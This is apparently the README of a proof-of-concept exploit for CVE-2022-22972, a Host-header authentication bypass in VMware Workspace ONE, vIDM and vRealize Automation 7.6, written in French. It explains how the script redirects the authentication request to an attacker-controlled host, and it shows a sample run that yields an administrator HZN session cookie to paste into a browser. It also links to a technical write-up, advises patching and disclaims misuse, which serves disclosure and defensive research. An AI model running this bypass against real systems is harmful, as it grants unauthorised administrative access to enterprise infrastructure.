
Exploit de preuve de concept pour CVE-2022-22972 qui contourne l'authentification dans VMware Workspace ONE, vIDM et vRealize Automation 7.6 via la manipulation de l'en-tête Host.
POC pour CVE-2022-22972 affectant VMware Workspace ONE, vIDM et vRealize Automation 7.6.
Une analyse technique des causes profondes de la vulnérabilité se trouve sur notre blog : https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
Ce script peut être utilisé pour contourner l'authentification sur vRealize Automation 7.6 en utilisant CVE-2022-22972. Workspace ONE et vIDM ont des points de terminaison d'authentification différents, mais le cœur de la vulnérabilité reste le même. Nous serions ravis d'accepter des pull requests si vous avez des articles de test pour vérifier le flux.
Ce script fonctionne en modifiant l'en-tête Host d'une requête HTTP POST d'un point de terminaison d'authentification VMware vers un Host contrôlé par un attaquant. Cela amène l'application VMware à contacter le Host avec des informations d'identification et si le Host renvoie 200, l'utilisateur est authentifié avec succès.
Ce script génère un cookie HZN qui peut être inclus dans des requêtes ultérieures pour effectuer des actions en tant qu'utilisateur compromis.
REMARQUE : Les arguments par défaut du script enverront la demande d'authentification à notre passerelle API AWS qui est configurée pour répondre avec un 200 pour le point de terminaison spécifique mentionné dans le blog. Vous pouvez changer cela avec l'option --host. Ce point de terminaison ne recevra aucune donnée sensible lors du flux d'exploitation - seulement une requête de l'application vulnérable avec l'en-tête d'authentification factice à laquelle il répond.
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint
HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8
Set the HZN cookie in your browser to bypass authentication
Mettez à jour vers la dernière version ou atténuez en suivant les instructions dans le VMSA
Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.